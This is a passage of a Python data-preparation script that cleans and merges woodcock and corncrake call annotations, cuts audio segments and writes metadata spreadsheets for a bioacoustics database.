\n src_dir = root_dir + 'Scolopax_rusticola_Recordings/Monitoring/'\n dst_dir = root_dir + 'Annotationen/_Segments/Scolopax_rusticola/'\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_MfN_Peenemuende+Schoenow_v04'\n\n # Collect annotations from excel files\n xlsx_files = [\n 'Scolopax_rusticola_MfN_Schoenow_2007.xlsx',\n 'Scolopax_rusticola_MfN_Schoenow_2008.xlsx',\n 'Scolopax_rusticola_MfN_Schoenow_2009.xlsx',\n 'Scolopax_rusticola_MfN_Peenemuende_2014.xlsx']\n\n df_list = []\n for file in xlsx_files:\n path = metadata_dir + file\n\n if not os.path.isfile(path): \n print('Error: File not found', path)\n\n df = pd.read_excel(path, engine='openpyxl')\n print(df)\n #print('n_rows', len(df))\n df_list.append(df)\n\n\n # Concat and sort\n df = pd.concat(df_list).reset_index(drop=True)\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n # Remove sub_dir col\n df = df.drop(columns=['sub_dir'])\n\n print(df)\n\n\n # Get unique audio files\n files = list(df['filename'].unique())\n n_files = len(files)\n print(files) # 'Peenemuende_140525_327_4ch', 'Schoenow_070401051656', 'Schoenow_070408045029', 'Schoenow_070505034545', 'Schoenow_070513034003', 'Schoenow_070520032033', 'Schoenow_070527032221', 'Schoenow_070603030318', 'Schoenow_070617025602', 'Schoenow_070624032240', 'Schoenow_080315061117', 'Schoenow_Ed2_080413045352', 'Schoenow_R4_1_090316050122', 'Schoenow_R4_1_090410040958']\n print('n_files', n_files)\n\n #quit()\n\n\n # Sanity checks (end_time - start_time = 5s)\n for ix, row in df.iterrows():\n if row['end_time'] - row['start_time'] != 5:\n print('Warning end_time-start_time != 5', ix)\n\n\n df_hakan = df.copy()\n\n # Create df with original annotations from Karl\n annotations_org_dir = root_dir + 'Scolopax_rusticola_Recordings/Monitoring/'\n df_annotations_org_list = []\n for file in files:\n path = annotations_org_dir + file + '.Table.1.selections.txt'\n if not os.path.isfile(path): print('Error: File not found', path)\n df = read_raven_label_file(path)\n\n # Drop cols Selection, View, Species\n df = df.drop(columns=['Selection', 'View', 'Species'])\n # Rename cols\n df = df.rename(columns={'Channel': 
'channel_ix', 'Begin Time (s)': 'start_time', 'End Time (s)': 'end_time', 'Low Freq (Hz)': 'start_frequency', 'High Freq (Hz)': 'end_frequency'})\n # Rename Calltype, Soundtype, calltype --> vocalization_type\n df = df.rename(columns={'Calltype': 'vocalization_type'})\n df = df.rename(columns={'Soundtype': 'vocalization_type'})\n df = df.rename(columns={'calltype': 'vocalization_type'})\n # Subtract 1 for channel values\n df['channel_ix'] = df['channel_ix'] - 1\n # Add filename col\n df['filename'] = file\n # Reorder cols\n df = df[['filename', 'channel_ix', 'start_time', 'end_time', 'start_frequency', 'end_frequency', 'vocalization_type']]\n # Rename vocalization_type 1: sq, 2: gr (grunt, squeak)\n df.loc[df['vocalization_type'] == 1, 'vocalization_type'] = 'squeak'\n df.loc[df['vocalization_type'] == 2, 'vocalization_type'] = 'grunt'\n\n # Drop duplicates (e.g. both views are annotated Waveform 1 & Spectrogram 1)\n df = df.drop_duplicates().reset_index(drop=True)\n\n \n #print(df)\n\n df_annotations_org_list.append(df)\n\n # Concat and sort\n df_annotations_org = pd.concat(df_annotations_org_list).reset_index(drop=True)\n df_annotations_org = df_annotations_org.sort_values(['filename', 'start_time']).reset_index(drop=True)\n print(df_annotations_org)\n\n # Expand df_annotations_org with channel infos from hakan\n no_matches_counter = 0\n row_list_new = []\n for ix, row in df_annotations_org.iterrows():\n\n filename = row['filename']\n channel_ix = row['channel_ix']\n start_time = row['start_time']\n end_time = row['end_time']\n vocalization_type = row['vocalization_type']\n\n if vocalization_type == 'squeak':\n \n df_matching = df_hakan.loc[\n (df_hakan['filename'] == filename) &\n (df_hakan['start_time']-0.1 <= start_time) &\n (df_hakan['end_time']-3 >= end_time)\n #(df_hakan['start_time']-0.1 <= start_time) &\n #(df_hakan['end_time']-2 >= end_time)\n ].reset_index(drop=True)\n \n \n # #if(len(test.index) < 1):\n # if(len(df_matching.index) > 4):\n # no_matches_counter += 1\n # print(filename, channel_ix, start_time, end_time)\n # print(df_matching)\n\n if(len(df_matching.index) > 1):\n # Get channel list\n channel_ixs = list(df_matching['channel_ix'].unique())\n if channel_ix not in channel_ixs:\n no_matches_counter += 1\n #print()\n #print('Channel not matching', filename, channel_ix, start_time, end_time, channel_ixs)\n\n # Copy row and create new list of rows with missing channels\n #row_list = df_annotations_org.iloc[[ix]].values.tolist()\n row_list = df_annotations_org.iloc[[ix]].values.tolist()\n channel_ix_org = row_list[0][1]\n \n #print('channel_ix_org', channel_ix_org)\n for ix in channel_ixs:\n if ix != channel_ix_org:\n row_new = row_list[0].copy()\n row_new[1] = ix\n row_list_new.append(row_new)\n #print(row_list_new)\n\n #print('no_matches_counter', no_matches_counter)\n \n # Append extra channels rows \n df_annotations_org = df_annotations_org.append(pd.DataFrame(row_list_new, columns=df_annotations_org.columns)).reset_index(drop=True)\n # Reorder\n df_annotations_org = df_annotations_org.sort_values(['filename', 'start_time', 'channel_ix']).reset_index(drop=True)\n #print(df_annotations_org[:20])\n print(df_annotations_org)\n \n # Create df_dilation (add time interval to start/end time)\n dilation_duration = 4.0\n df_dilation = df_annotations_org.copy()\n df_dilation['start_time'] = df_dilation['start_time'] - dilation_duration\n df_dilation['end_time'] = df_dilation['end_time'] + dilation_duration\n print(df_dilation)\n\n # Check if start_time >= 0 & end_time <= 
duration ?\n df_dilation.loc[df_dilation['start_time'] < 0.0, 'start_time'] = 0.0\n\n \n\n # Create df_merged for original annotations\n df_merged_list = {}\n df_merged_list['filename'] = []\n df_merged_list['start_time'] = []\n df_merged_list['end_time'] = []\n \n filename = df_dilation.filename.values[0]\n start_time = df_dilation.start_time.values[0]\n end_time = df_dilation.end_time.values[0]\n #print(filename, start_time, end_time)\n\n max_time_without_annotation = 2 #10 #10 #2 #4\n\n for ix, row in df_dilation.iterrows():\n \n if row['filename'] != filename or row['start_time'] - end_time > max_time_without_annotation:\n # Add current values to df_merged_list\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n # Init new \n filename = row['filename']\n start_time = row['start_time']\n end_time = row['end_time']\n else:\n end_time = row['end_time']\n\n # Add last row\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n\n df_merged = pd.DataFrame.from_dict(df_merged_list)\n #print(df_merged)\n\n # Round times to nearest second\n df_merged['start_time'] = df_merged['start_time'].apply(np.floor)\n df_merged['end_time'] = df_merged['end_time'].apply(np.ceil)\n\n # Write audio parts and rename files according to annotation interval\n for ix, row in df_merged.iterrows():\n filename = row['filename']\n start_time = row['start_time'] # rounded to seconds\n end_time = row['end_time']\n \n filename_new = filename + create_postfix_str(start_time)\n df_merged.at[ix, 'filename_new'] = filename_new\n\n if write_audio_parts:\n path = src_dir + filename + '.wav'\n write_part_of_audio_file(path, start_time, end_time, dst_dir=dst_dir)\n\n \n print(df_merged)\n\n #quit()\n\n\n\n # Create df with annotation times relative to cuttet parts\n #df_new = df.copy()\n #df = df_hakan.copy()\n df = df_annotations_org.copy()\n #print(df)\n for ix, row in df.iterrows():\n filename = row['filename']\n channel_ix = row['channel_ix']\n start_time = row['start_time']\n end_time = row['end_time']\n #print(start_time.dtype)\n\n df_merged_row = df_merged.loc[\n (df_merged['filename'] == filename) &\n (df_merged['start_time'] <= start_time) &\n (df_merged['end_time'] >= end_time)\n ].reset_index(drop=True)\n \n assert len(df_merged_row.index) == 1\n\n filename_new = df_merged_row.at[0, 'filename_new']\n start_time_new = start_time - df_merged_row.at[0, 'start_time']\n end_time_new = end_time - df_merged_row.at[0, 'start_time']\n \n #print(filename, start_time, end_time, channel_ix, filename_new, df_merged_row.at[0, 'start_time'], df_merged_row.at[0, 'end_time'], start_time_new, end_time_new)\n\n df.at[ix, 'filename'] = filename_new\n df.at[ix, 'start_time'] = start_time_new\n df.at[ix, 'end_time'] = end_time_new\n\n \n #print(df[['filename', 'channel_ix', 'start_time', 'end_time', 'vocalization_type']])\n\n\n # Additional infos\n # id_level, species_latin_name, annotator_name, \n # record_date, record_filepath, recordist_name, \n # equipment_name, equipment_sound_device, equipment_microphone,\n # location_name, location_habitat, location_lat, location_lng\n # collection_name\n\n df['id_level'] = 1\n df['species_latin_name'] = 'Scolopax rusticola'\n df['annotator_name'] = 'Frommolt, Karl-Heinz'\n df['recordist_name'] = 'Frommolt, Karl-Heinz'\n \n df['location_name'] = None\n df['record_date'] = None\n df['record_time'] = None\n\n 
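    # Judging by filenames elsewhere in this script (e.g.
    # 'Schoenow_070401051656_S01146000ms' in the comments below),
    # create_postfix_str(start_time) appears to append the start time in
    # milliseconds, roughly (an assumption - the helper is defined earlier
    # in this file, outside this excerpt):
    # postfix = '_S' + str(int(start_time*1000)).zfill(8) + 'ms'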
df['collection_name'] = 'devise'\n\n df['record_filepath'] = None\n\n\n # Get location and date from filename\n for ix, row in df.iterrows():\n filename = row['filename']\n parts = filename.split('_')\n location_name = parts[0]\n df.at[ix, 'location_name'] = location_name\n time_str = None\n \n if location_name == 'Peenemuende':\n # Peenemuende_140525_327_4ch_S00055000ms \n date_str = parts[1]\n \n else:\n # Schoenow_070401051656_S01146000ms, Schoenow_R4_1_090410040958_S01146000ms \n date_str = parts[-2]\n time_str = date_str[6:]\n \n time_str = time_str[:2] + ':' + time_str[2:4] + ':' + time_str[4:6]\n \n # From Artenspektrum2007.xlsx recording time +1 hour for some recordings?\n #time_str = str(int(time_str[:2]) + 1).zfill(2) + ':' + time_str[2:4] + ':' + time_str[4:6] \n \n data_str = '20' + date_str\n data_str = data_str[:4] + '-' + data_str[4:6] + '-' + data_str[6:8]\n #print(ix, parts, location_name, data_str, time_str)\n\n df.at[ix, 'record_date'] = data_str\n df.at[ix, 'record_time'] = time_str\n\n path_new = dst_dir + filename + '.wav'\n if not os.path.isfile(path_new): \n print('Error: File not found', path_new)\n\n df.at[ix, 'record_filepath'] = path_new\n\n\n # Write metadata (excel, csv)\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n #df.to_csv(metadata_path_without_ext + '.csv', index=False)\n\n\n print(df)\n\n#process_hakan_schoenow()\n\ndef postprocess_hakan_arsu(year):\n\n write_audio_parts = False # True False\n write_metadata = True\n \n src_dir = root_dir + 'Annotationen/ARSU_temp/'\n #dst_dir = root_dir + 'Annotationen/_Segments/temp/'\n dst_dir = root_dir + 'Annotationen/_Segments/Scolopax_rusticola/'\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_ARSU_' + str(year) + '_v07'\n\n # Collect annotations from excel files\n xlsx_files = [\n #\"Scolopax_rusticola_Devise_ARSU_2021_v1.xlsx\",\n #\"Scolopax_rusticola_Devise_ARSU_2022_v1.xlsx\",\n 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '_v1.xlsx'\n ]\n \n df_list = []\n for file in xlsx_files:\n path = src_dir + file\n\n if not os.path.isfile(path):\n print(\"Error: File not found\", path)\n\n df = pd.read_excel(path, keep_default_na=False, engine=\"openpyxl\")\n df_list.append(df)\n print(\"n_rows\", len(df))\n\n df = pd.concat(df_list).reset_index(drop=True)\n #print(df)\n\n # Get unique audio files\n files = list(df[\"filename\"].unique())\n n_files = len(files)\n # print(files)\n print(\"n_files\", n_files)\n\n\n\n # Create df_dilation (add time interval to start/end time)\n dilation_duration = 4.0\n df_dilation = df.copy()\n df_dilation['start_time'] = df_dilation['start_time'] - dilation_duration\n df_dilation['end_time'] = df_dilation['end_time'] + dilation_duration\n #print(df_dilation)\n\n # Check/correkt if start_time < 0 or end_time > duration\n #df_dilation.loc[df_dilation['start_time'] < 0.0, 'start_time'] = 0.0\n for ix, row in df_dilation.iterrows():\n if row['start_time'] < 0.0:\n df_dilation.at[ix, 'start_time'] = 0.0\n print(row['filename'], 'start_time < 0.0,', row['start_time'], '-->', df_dilation.at[ix, 'start_time'])\n # Get duration\n path = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + row['filename'] + '.flac'\n with sf.SoundFile(path) as f:\n duration = f.frames/f.samplerate\n if row['end_time'] > duration:\n df_dilation.at[ix, 'end_time'] = duration\n print(row['filename'], 'end_time > duration,', row['end_time'], '-->', df_dilation.at[ix, 'end_time'] )\n \n 
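    # Worked example for the merge below (after the +-4 s dilation above,
    # with max_time_without_annotation = 2): annotations [100.0, 102.0] and
    # [110.0, 111.0] become [96.0, 106.0] and [106.0, 115.0] after dilation;
    # the gap 106.0 - 106.0 = 0.0 <= 2, so they merge into one segment
    # [96.0, 115.0]. A later annotation [130.0, 131.0] -> [126.0, 135.0]
    # starts 11 s after 115.0 and therefore stays a separate segment.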
#quit()\n\n # Create df_merged for original annotations\n df_merged_list = {}\n df_merged_list['filename'] = []\n df_merged_list['start_time'] = []\n df_merged_list['end_time'] = []\n \n filename = df_dilation.filename.values[0]\n start_time = df_dilation.start_time.values[0]\n end_time = df_dilation.end_time.values[0]\n #print(filename, start_time, end_time)\n\n max_time_without_annotation = 2 #10 #2 #4\n\n for ix, row in df_dilation.iterrows():\n\n if row['filename'] != filename or row['start_time'] - end_time > max_time_without_annotation:\n # Add current values to df_merged_list\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n # Init new \n filename = row['filename']\n start_time = row['start_time']\n end_time = row['end_time']\n else:\n end_time = row['end_time']\n\n # Add last row\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n\n df_merged = pd.DataFrame.from_dict(df_merged_list)\n #print(df_merged)\n \n\n\n # Round times to nearest second\n df_merged['start_time'] = df_merged['start_time'].apply(np.floor)\n df_merged['end_time'] = df_merged['end_time'].apply(np.ceil)\n\n # Write audio parts and rename files according to annotation interval\n for ix, row in df_merged.iterrows():\n filename = row['filename']\n start_time = row['start_time'] # rounded to seconds\n end_time = row['end_time']\n \n filename_new = filename + create_postfix_str(start_time) + '_c0'\n df_merged.at[ix, 'filename_new'] = filename_new\n\n if write_audio_parts:\n path = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + filename + '.flac'\n print('Writing', filename_new)\n write_part_of_audio_file(path, start_time, end_time, channel_ix=0, dst_dir=dst_dir, format='wav')\n\n \n #print(df_merged)\n n_files_merged = len(df_merged)\n print('n_files_merged', n_files_merged)\n\n #quit()\n\n # Create df with annotation times relative to cuttet parts\n\n #print(df)\n for ix, row in df.iterrows():\n filename = row['filename']\n channel_ix = row['channel_ix']\n start_time = row['start_time']\n end_time = row['end_time']\n #print(start_time.dtype)\n\n df_merged_row = df_merged.loc[\n (df_merged['filename'] == filename) &\n (df_merged['start_time'] <= start_time) &\n (df_merged['end_time'] >= end_time)\n ].reset_index(drop=True)\n \n assert len(df_merged_row.index) == 1\n\n filename_new = df_merged_row.at[0, 'filename_new']\n start_time_new = start_time - df_merged_row.at[0, 'start_time']\n end_time_new = end_time - df_merged_row.at[0, 'start_time']\n \n #print(filename, start_time, end_time, channel_ix, filename_new, df_merged_row.at[0, 'start_time'], df_merged_row.at[0, 'end_time'], start_time_new, end_time_new)\n\n df.at[ix, 'filename'] = filename_new\n df.at[ix, 'start_time'] = start_time_new\n df.at[ix, 'end_time'] = end_time_new\n\n # Add file path\n df.at[ix, 'record_filepath'] = dst_dir + filename_new + '.wav'\n\n\n # Add channel info\n df['channel_ix'] = 0\n # Add id_level=1 (Tim knows)\n df['id_level'] = 1\n # Correct time format (e.g. 
21-28-11 --> 21:28:11)\n    df['record_time'] = df['record_time'].str.replace('-',':')\n\n    # Add recording equipment info\n    df['equipment_name'] = 'devise'\n\n\n    # Rename cols\n    df = df.rename(columns={\"quality\": \"quality_tag\"})\n    df = df.rename(columns={\"has_background\": \"background_level\"})\n    df = df.rename(columns={\"comment\": \"remarks\"})\n\n    # Correct some mistakes\n    df.loc[df['vocalization_type'] == '3', 'vocalization_type'] = 'grunt'\n    df.loc[df['vocalization_type'] == 'sgr', 'vocalization_type'] = 'grunt'\n    \n\n    # Correct start/end freq (Tim only annotated time intervals!)\n    df.loc[df['vocalization_type'] == 'grunt', 'start_frequency'] = 200.0\n    df.loc[df['vocalization_type'] == 'grunt', 'end_frequency'] = 2500.0 # 2000/2500\n    df.loc[df['vocalization_type'] == 'squeak', 'start_frequency'] = 1500.0 # 1500/2000\n    df.loc[df['vocalization_type'] == 'squeak', 'end_frequency'] = None # 24000.0/NF/None\n    \n    print(df)\n\n\n\n    # Write metadata (excel, csv)\n    if write_metadata:\n        df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n        #df.to_csv(metadata_path_without_ext + '.csv', index=False)\n\n#postprocess_hakan_arsu(2021)\n#postprocess_hakan_arsu(2022)\n\ndef get_arsu_background_annotations(year):\n\n    # Beginning is identical to postprocess_hakan_arsu(year)\n    # But noise will be annotated later via create_noise_annotations (using get_open_intervals)\n\n    write_audio_parts = False # True False\n    write_metadata = True\n    \n    src_dir = root_dir + 'Annotationen/ARSU_temp/'\n    #dst_dir = root_dir + 'Annotationen/_Segments/temp/'\n    #dst_dir = root_dir + 'Annotationen/_Segments/Scolopax_rusticola/'\n    dst_dir = root_dir + 'Annotationen/_Segments/Scolopax_rusticola_BG/'\n    metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_BG_ARSU_' + str(year) + '_temp'\n\n    # Collect annotations from excel files\n    xlsx_files = [\n        'Scolopax_rusticola_Devise_ARSU_' + str(year) + '_v1.xlsx'\n    ]\n    \n    df_list = []\n    for file in xlsx_files:\n        path = src_dir + file\n\n        if not os.path.isfile(path):\n            print(\"Error: File not found\", path)\n\n        df = pd.read_excel(path, keep_default_na=False, engine=\"openpyxl\")\n        df_list.append(df)\n        print(\"n_rows\", len(df))\n\n    df = pd.concat(df_list).reset_index(drop=True)\n    #print(df)\n\n    # Get unique audio files\n    files = list(df[\"filename\"].unique())\n    n_files = len(files)\n    # print(files)\n    print(\"n_files\", n_files)\n\n\n\n    # Create df_dilation (add time interval to start/end time)\n    dilation_duration = 4.0\n    df_dilation = df.copy()\n    df_dilation['start_time'] = df_dilation['start_time'] - dilation_duration\n    df_dilation['end_time'] = df_dilation['end_time'] + dilation_duration\n    #print(df_dilation)\n\n    # Check/correct if start_time < 0 or end_time > duration\n    #df_dilation.loc[df_dilation['start_time'] < 0.0, 'start_time'] = 0.0\n    for ix, row in df_dilation.iterrows():\n        if row['start_time'] < 0.0:\n            df_dilation.at[ix, 'start_time'] = 0.0\n            print(row['filename'], 'start_time < 0.0,', row['start_time'], '-->', df_dilation.at[ix, 'start_time'])\n        # Get duration\n        path = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + row['filename'] + '.flac'\n        with sf.SoundFile(path) as f:\n            duration = f.frames/f.samplerate\n        if row['end_time'] > duration:\n            df_dilation.at[ix, 'end_time'] = duration\n            print(row['filename'], 'end_time > duration,', row['end_time'], '-->', df_dilation.at[ix, 'end_time'])\n    \n    #quit()\n\n    # Create df_merged for original annotations\n    df_merged_list = {}\n    
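    # Note: this interval-merge block repeats the logic from
    # postprocess_hakan_arsu almost verbatim. A shared helper could replace
    # both copies, e.g. (hypothetical sketch, names not in the original):
    #
    # def merge_intervals(df_dilation, max_gap=2.0):
    #     merged = {'filename': [], 'start_time': [], 'end_time': []}
    #     fn, t0, t1 = None, None, None
    #     for _, r in df_dilation.iterrows():
    #         if fn is None:
    #             fn, t0, t1 = r['filename'], r['start_time'], r['end_time']
    #         elif r['filename'] != fn or r['start_time'] - t1 > max_gap:
    #             merged['filename'].append(fn)
    #             merged['start_time'].append(t0)
    #             merged['end_time'].append(t1)
    #             fn, t0, t1 = r['filename'], r['start_time'], r['end_time']
    #         else:
    #             t1 = r['end_time']
    #     if fn is not None:
    #         merged['filename'].append(fn)
    #         merged['start_time'].append(t0)
    #         merged['end_time'].append(t1)
    #     return pd.DataFrame.from_dict(merged)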
df_merged_list['filename'] = []\n df_merged_list['start_time'] = []\n df_merged_list['end_time'] = []\n \n filename = df_dilation.filename.values[0]\n start_time = df_dilation.start_time.values[0]\n end_time = df_dilation.end_time.values[0]\n #print(filename, start_time, end_time)\n\n max_time_without_annotation = 2 #10 #2 #4\n\n for ix, row in df_dilation.iterrows():\n\n if row['filename'] != filename or row['start_time'] - end_time > max_time_without_annotation:\n # Add current values to df_merged_list\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n # Init new \n filename = row['filename']\n start_time = row['start_time']\n end_time = row['end_time']\n else:\n end_time = row['end_time']\n\n # Add last row\n df_merged_list['filename'].append(filename)\n df_merged_list['start_time'].append(start_time)\n df_merged_list['end_time'].append(end_time)\n\n df_merged = pd.DataFrame.from_dict(df_merged_list)\n #print(df_merged)\n \n\n\n # Round times to nearest second\n df_merged['start_time'] = df_merged['start_time'].apply(np.floor)\n df_merged['end_time'] = df_merged['end_time'].apply(np.ceil)\n\n print(df_merged)\n n_files_merged = len(df_merged)\n print('n_files_merged', n_files_merged)\n\n \n\n # Create noise (species absent) annotations\n\n # Add record_filepath to df_merged (to get duration)\n df_merged['record_filepath'] = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + df_merged['filename'] + '.flac'\n \n\n df = create_noise_annotations(df_merged, dilation_duration=0.0, min_duration=5.0)\n df['noise_name'] = 'Scolopax rusticola absent'\n \n # Get total duration of noise annotations (and species annotations)\n print('noise_duration_total', (df['end_time']-df['start_time']).sum()) # 257190.02933333334\n print('species_duration_total', (df_merged['end_time']-df_merged['start_time']).sum()) # 7688.0\n\n #print(df)\n\n # Reduce noise annotations (to beginning and end parts)\n df = divide_intervals_into_beginning_and_end(df, segment_duration=20.0, segment_duration_max=50.0, segment_duration_min=10.0)\n\n # Round times to nearest second\n df['start_time'] = df['start_time'].apply(np.floor)\n df['end_time'] = df['end_time'].apply(np.floor)\n\n # Sanity checks and corrections for start_time (shoud not be negative)\n if not df.loc[df['start_time'] < 0.0].empty:\n print('Warning negative start_time:', df.loc[df['start_time'] < 0.0])\n df.loc[df['start_time'] < 0.0, 'start_time'] = 0.0 \n\n # Devise04_2022-06-16T02-47-13_s01852000ms_c0 makes problems when reading part via soundfile\n if year == 2022:\n df = df.drop(df[(df.filename == 'Devise04_2022-06-16T02-47-13') & (df.start_time == 1852)].index)\n\n \n print('noise_duration_total', (df['end_time']-df['start_time']).sum()) # 16300.0\n\n print(df)\n\n #quit()\n\n # Write audio parts and rename files according to annotation interval\n for ix, row in df.iterrows():\n filename = row['filename']\n start_time = row['start_time'] # rounded to seconds\n end_time = row['end_time']\n \n filename_new = filename + create_postfix_str(start_time, add_start_time_even_if_zero=True) + '_c0'\n df.at[ix, 'filename_new'] = filename_new\n\n if write_audio_parts:\n path = src_dir + 'Scolopax_rusticola_Devise_ARSU_' + str(year) + '/' + filename + '.flac'\n print('Writing', filename_new)\n write_part_of_audio_file(path, start_time, end_time, channel_ix=0, dst_dir=dst_dir, format='wav', add_start_time_even_if_zero=True)\n\n \n #print(df)\n\n #quit()\n\n # Add 
metadata:\n df['id_level'] = 1\n df['annotator_name'] = 'Steinkamp, Tim'\n df['recordist_name'] = 'Steinkamp, Tim'\n df['location_name'] = 'Gellener Torfmöörte'\n df['equipment_name'] = 'devise'\n df['collection_name'] = 'devise'\n \n # Adjust path to new filename\n df['record_filepath'] = dst_dir + df['filename_new'] + '.wav'\n\n\n # Add record_date, record_time from filename and adjust start/end time to 0.0 and duration of file\n df['record_date'] = None\n df['record_time'] = None\n for ix, row in df.iterrows():\n df.at[ix, 'record_date'] = row['filename'].split('_')[1][:10]\n df.at[ix, 'record_time'] = row['filename'].split('_')[1][11:19].replace(\"-\", \":\")\n\n # Check and adjust start/end time (to 0.0, duration)\n path = dst_dir + row['filename_new'] + '.wav'\n with sf.SoundFile(path) as f:\n duration = f.frames/f.samplerate\n assert row['end_time'] - row['start_time'] == duration\n df.at[ix, 'start_time'] = 0.0\n df.at[ix, 'end_time'] = duration\n\n\n #df.at[ix, 'filename'] = filename_new\n \n # Replace filename with filename_new\n df['filename'] = df['filename_new']\n df = df.drop(columns=['filename_new'])\n\n print(df)\n\n\n # Write metadata (excel, csv)\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n #df.to_csv(metadata_path_without_ext + '.csv', index=False)\n\n#get_arsu_background_annotations(2022)\n#get_arsu_background_annotations(2021)\n\ndef process_Lars_Annotations():\n\n write_metadata = True\n \n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/CrexCrex_LarsAnnotaions_v03'\n\n df_list = []\n\n # Search for audacity label track txt files\n #root_src_dir = lars_dir + 'Criewen_2022_05_15/'\n #root_src_dir = lars_dir + 'Unteres_Odertal_2021_06_10/'\n #root_src_dir = lars_dir + 'Unteres_Odertal_2021_06_16/'\n #root_src_dir = lars_dir + 'Unteres_Odertal_2021_06_23/'\n #root_src_dir = lars_dir + 'Unteres_Odertal_2021_07_15/'\n #root_src_dir = lars_dir + 'Crex_crex Tierstimmenarchiv'\n\n # All Lars Annotations\n root_src_dir = lars_dir\n \n n_files = 0\n for root, dirs, files in os.walk(root_src_dir):\n for file in files:\n # Only use txt file with corresponing wav file\n if file.endswith('.txt'):\n path = os.path.join(root, file)\n path_wav = path[:-4] + '.wav'\n if os.path.isfile(path_wav): \n print(path)\n df = read_audacity_label_file(path, ignore_freq_range=True)\n #if df is not None:\n df = process_audacity_label_data(df, check_label_data=False)\n\n # Add filename, record_filepath\n df['record_filepath'] = path_wav\n df['filename'] = os.path.splitext(os.path.basename(path_wav))[0]\n #print(df)\n\n df_list.append(df)\n else:\n print('Warning no corresponding wav file', path)\n \n n_files += 1\n \n \n # Concat and sort\n df = pd.concat(df_list).reset_index(drop=True)\n df = df.sort_values(['filename', 'start_time']).reset_index(drop=True)\n\n # Move filename to front\n df.insert(0, 'filename', df.pop('filename'))\n\n print(df)\n\n # Check distinct species/bg events\n species_unique = list(df[\"species\"].unique())\n print('species_unique', species_unique) # ['Crex crex BG', 'wind', 'Crex crex']\n\n # Postprocess annotations\n\n # Rename cols\n df = df.rename(columns={\"species\": \"species_latin_name\"})\n df = df.rename(columns={\"call_type\": \"vocalization_type\"})\n df = df.rename(columns={\"quality\": \"quality_tag\"})\n df = df.rename(columns={\"comment\": \"remarks\"})\n\n # Add cols\n df['record_date'] = None\n df['record_time'] = None\n df['location_name'] = None\n 
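    # The filename parsing in the loop below uses plain string slicing; for
    # the 'Devise02_2021-06-10T22-38-32_...' pattern the same result could
    # also be obtained with datetime parsing, e.g. (sketch, not used by the
    # original code):
    # from datetime import datetime
    # dt = datetime.strptime('2021-06-10T22-38-32', '%Y-%m-%dT%H-%M-%S')
    # dt.date().isoformat()  # -> '2021-06-10'
    # dt.time().isoformat()  # -> '22:38:32'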
df['noise_name'] = None\n df['annotator_name'] = 'Beck, Lars'\n df['recordist_name'] = 'Frommolt, Karl-Heinz'\n df['collection_name'] = 'devise'\n\n # Add infos\n for ix, row in df.iterrows():\n filename = row['filename']\n species = row['species_latin_name']\n\n filename_parts = filename.split('_')\n\n if filename.startswith('CRIEWEN'):\n df.at[ix, 'location_name'] = 'Criewen'\n df.at[ix, 'record_date'] = filename_parts[1][:4] + '-' + filename_parts[1][4:6] + '-' + filename_parts[1][6:8]\n df.at[ix, 'record_time'] = filename_parts[2][:2] + ':' + filename_parts[2][2:4] + ':' + filename_parts[2][4:6]\n\n if filename.startswith('Devise'):\n df.at[ix, 'location_name'] = 'Unteres Odertal'\n df.at[ix, 'record_date'] = filename_parts[1][:10]\n df.at[ix, 'record_time'] = filename_parts[1][11:19].replace(\"-\", \":\")\n\n if species != 'Crex crex':\n df.at[ix, 'species_latin_name'] = None\n if species == 'Crex crex BG':\n df.at[ix, 'noise_name'] = 'Crex crex absent'\n else:\n df.at[ix, 'noise_name'] = species\n print(ix, filename, species)\n\n\n # Correct vocalization_type = s --> song\n df.loc[df['vocalization_type'] == 's', 'vocalization_type'] = 'song'\n \n \n # Write metadata (excel, csv)\n if write_metadata:\n df.to_excel(metadata_path_without_ext + '.xlsx', index=False, engine='openpyxl')\n\n#process_Lars_Annotations()\n\n\ndef process_fva():\n\n write_metadata = False # True False\n metadata_path_without_ext = root_dir + 'Annotationen/_MetadataReadyForDbInsert/Scolopax_rusticola_FVA_v02'\n\n\n audio_src_dir = metadata_dir + 'Scolopax_rusticola_FVA_BadenWürttemberg/Dateien_MFN_FVA/'\n\n # Read excel file\n path = metadata_dir + 'Scolopax_rusticola_FVA_BadenWürttemberg/220722_fva_selections.csv'\n\n if not os.path.isfile(path): \n print('Error: File not found', path)\n\n #encoding = 'cp1252'\n encoding = 'ISO-8859-1'\n df = pd.read_csv(path, sep=';', encoding=encoding)\n #print(df.columns.values.tolist())\n \n # Drop cols not used (yet)\n df = df.drop(columns=[' \"id\"', 'Unnamed: 0', 'deploy_id', 'dateiname', 'selection', 'view', 'channel', 'species_code', 'common_name', 'import'])\n \n \n \n # Sort by (new) file name and begin_time\n df = df.sort_values(['new_name', 'begin_time']).reset_index(drop=True)\n\n #print(df[10:30])\n\n print(\"n_annotations\", len(df)) # 2497\n\n # Get unique audio files\n files = list(df['new_name'].unique())\n n_files = len(files)\n #print(files)\n print('n_files', n_files) # 369 (10min, mono, 48 kHz)\n\n # Get unique anmerkung\n remarks = list(df['anmerkung'].unique())\n n_remarks = len(remarks)\n #print(remarks)\n 